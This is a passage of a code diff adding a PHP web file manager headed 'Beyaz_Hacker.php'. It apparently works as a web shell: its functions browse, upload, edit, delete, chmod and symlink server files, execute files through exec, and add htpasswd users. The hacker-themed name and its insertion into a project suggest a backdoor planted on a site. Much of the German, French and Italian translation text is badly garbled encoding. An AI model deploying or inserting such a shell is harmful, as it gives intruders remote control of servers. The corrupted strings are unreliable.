+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist ($list, $key, $reverse) {
+
+	$dirs = array();
+	$files = array();
+	
+	for ($i = 0; $i < sizeof($list); $i++) {
+		if ($list[$i]['is_dir']) $dirs[] = $list[$i];
+		else $files[] = $list[$i];
+	}
+
+	quicksort($dirs, 0, sizeof($dirs) - 1, $key);
+	if ($reverse) $dirs = array_reverse($dirs);
+
+	quicksort($files, 0, sizeof($files) - 1, $key);
+	if ($reverse) $files = array_reverse($files);
+
+	return array_merge($dirs, $files);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!file_exists($file)) return false;
+
+	if (@is_dir($file) && !@is_link($file)) {
+
+		$success = false;
+
+		if (@rmdir($file)) {
+
+			$success = true;
+
+		} elseif ($dir = @opendir($file)) {
+
+			$success = true;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$success = false;
+				}
+			}
+			closedir($dir);
+
+			if ($success) $success = @rmdir($file);
+
+		}
+
+		return $success;
+
+	}
+
+	return @unlink($file);
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	$list = sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">Beyaz_Hacker.php</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	column_title('filename', $sort, $reverse);
+	column_title('size', $sort, $reverse);
+
+	if (!$win) {
+		column_title('permission', $sort, $reverse);
+		column_title('owner', $sort, $reverse);
+		column_title('group', $sort, $reverse);
+	}
+
+	echo '	<th class="functions">' . word('functions') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "</td>\n";
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="functions">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'delete';
+			$actions[] = 'rename';
+			$actions[] = 'move';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'copy';
+			$actions[] = 'download';
+			if ($file['is_writable']) $actions[] = 'edit';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'delete';
+		$actions[] = 'move';
+	}
+	$actions[] = 'copy';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function column_title ($column, $sort, $reverse) {
+	global $self, $directory;
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if ($sort == $column) {
+		if (!$reverse) {
+			$r = '&amp;reverse=true';
+			$arr = ' &and;';
+		} else {
+			$arr = ' &or;';
+		}
+	} else {
+		$r = '';
+	}
+	echo "\t<th class=\"$column\"><a href=\"$self?{$d}sort=$column$r\">" . word($column) . "</a>$arr</th>\n";
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function edit ($file) {
+	global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="edit" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $site_charset;
+	return htmlentities($string, ENT_COMPAT, $site_charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Gr����¯�¿�½������¶����¯�¿�½���¯���¿���½e',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'functions' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausf����¯�¿�½������¼hren',
+
+'create_symlink' => 'Symlink erstellen',
+'delete' => 'l����¯�¿�½������¶schen',
+'rename' => 'umbenennen',
+'move' => 'verschieben',
+'copy' => 'kopieren',
+'edit' => 'editieren',
+'download' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zur����¯�¿�½������¼cksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'back' => 'zur����¯�¿�½������¼ck',
+'destination' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzuf����¯�¿�½������¼gen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzuf����¯�¿�½������¼gen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_delete' => 'Sollen folgende Dateien wirklich gel����¯�¿�½������¶scht werden?',
+'deleted' => "Folgende Dateien wurden gel����¯�¿�½������¶scht:\n[%1]",
+'not_deleted' => "Folgende Dateien konnten nicht gel����¯�¿�½������¶scht werden:\n[%1]",
+'rename_file' => 'Benenne Datei um:',
+'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'move_files' => 'Verschieben folgende Dateien:',
+'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'copy_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_edited' => '"[%1]" kann nicht editiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgef����¯�¿�½������¼hrt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgef����¯�¿�½������¼hrt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte f����¯�¿�½������¼r "[%1]":',
+'permission_set' => 'Die Rechte f����¯�¿�½������¼r "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte f����¯�¿�½������¼r "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'R����¯�¿�½������©pertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propri����¯�¿�½������©taire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'functions' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Ex����¯�¿�½������©cuter',
+
+'create_symlink' => 'Cr����¯�¿�½������©er lien symbolique',
+'delete' => 'Effacer',
+'rename' => 'Renommer',
+'move' => 'D����¯�¿�½������©placer',
+'copy' => 'Copier',
+'edit' => 'Ouvrir',
+'download' => 'T����¯�¿�½������©l����¯�¿�½������©charger sur PC',
+'upload' => 'T����¯�¿�½������©l����¯�¿�½������©charger sur serveur',
+'create' => 'Cr����¯�¿�½������©er',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Ex����¯�¿�½������©cuter',
+'reset' => 'R����¯�¿�½������©initialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'back' => 'Retour',
+'destination' => 'Destination',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© t����¯�¿�½������©l����¯�¿�½������©charg����¯�¿�½������© sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas ����¯�¿�½������©t����¯�¿�½������© t����¯�¿�½������©l����¯�¿�½������©charg����¯�¿�½������© sur le serveur.',
+'already_exists' => '"[%1]" existe d����¯�¿�½������©j����¯�¿�½ .',
+'created' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© cr����¯�¿�½������©����¯�¿�½������©.',
+'not_created' => '"[%1]" n a pas pu ����¯�¿�½������ªtre cr����¯�¿�½������©����¯�¿�½������©.',
+'really_delete' => 'Effacer le fichier?',
+'deleted' => "Ces fichiers ont ����¯�¿�½������©t����¯�¿�½������© d����¯�¿�½������©tuits:\n[%1]",
+'not_deleted' => "Ces fichiers n ont pu ����¯�¿�½������ªtre d����¯�¿�½������©truits:\n[%1]",
+'rename_file' => 'Renomme fichier:',
+'renamed' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© renomm����¯�¿�½������© en "[%2]".',
+'not_renamed' => '"[%1] n a pas pu ����¯�¿�½������ªtre renomm����¯�¿�½������© en "[%2]".',
+'move_files' => 'D����¯�¿�½������©placer ces fichiers:',
+'moved' => "Ces fichiers ont ����¯�¿�½������©t����¯�¿�½������© d����¯�¿�½������©plac����¯�¿�½������©s en \"[%2]\":\n[%1]",
+'not_moved' => "Ces fichiers n ont pas pu ����¯�¿�½������ªtre d����¯�¿�½������©plac����¯�¿�½������©s en \"[%2]\":\n[%1]",
+'copy_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont ����¯�¿�½������©t����¯�¿�½������© copi����¯�¿�½������©s en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu ����¯�¿�½������ªtre copi����¯�¿�½������©s en \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" ne peut ����¯�¿�½������ªtre ouvert.',
+'executed' => "\"[%1]\" a ����¯�¿�½������©t����¯�¿�½������© brillamment ex����¯�¿�½������©cut����¯�¿�½������© :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu ����¯�¿�½������ªtre ex����¯�¿�½������©cut����¯�¿�½������©:\n{%2}",
+'saved' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© sauvegard����¯�¿�½������©.',
+'not_saved' => '"[%1]" n a pas pu ����¯�¿�½������ªtre sauvegard����¯�¿�½������©.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a ����¯�¿�½������©t����¯�¿�½������© cr����¯�¿�½������©e.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu ����¯�¿�½������ªtre cr����¯�¿�½������©����¯�¿�½������©.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont ����¯�¿�½������©t����¯�¿�½������© chang����¯�¿�½������©s en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu ����¯�¿�½������ªtre chang����¯�¿�½������©s en[%2].',
+'not_readable' => '"[%1]" ne peut pas ����¯�¿�½������ªtre ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'functions' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'delete' => 'cancella',
+'rename' => 'rinomina',
+'move' => 'sposta',
+'copy' => 'copia',
+'edit' => 'modifica',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'back' => 'indietro',
+'destination' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" ����¯�¿�½������¨ stato caricato.',
+'not_uploaded' => '"[%1]" non ����¯�¿�½������¨ stato caricato.',
+'already_exists' => '"[%1]" esiste gi����¯�¿�½ .',
+'created' => '"[%1]" ����¯�¿�½������¨ stato creato.',
+'not_created' => '"[%1]" non ����¯�¿�½������¨ stato creato.',
+'really_delete' => 'Cancello questi file ?',
+'deleted' => "Questi file sono stati cancellati:\n[%1]",
+'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
+'rename_file' => 'File rinominato:',
+'renamed' => '"[%1]" ����¯�¿�½������¨ stato rinominato in "[%2]".',
+'not_renamed' => '"[%1] non ����¯�¿�½������¨ stato rinominato in "[%2]".',
+'move_files' => 'Sposto questi file:',
+'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'copy_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" non pu����¯�¿�½������² essere modificato.',
+'executed' => "\"[%1]\" ����¯�¿�½������¨ stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non ����¯�¿�½������¨ stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" ����¯�¿�½������¨ stato salvato.',
+'not_saved' => '"[%1]" non ����¯�¿�½������¨ stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" ����¯�¿�½������¨ stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non ����¯�¿�½������¨ stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
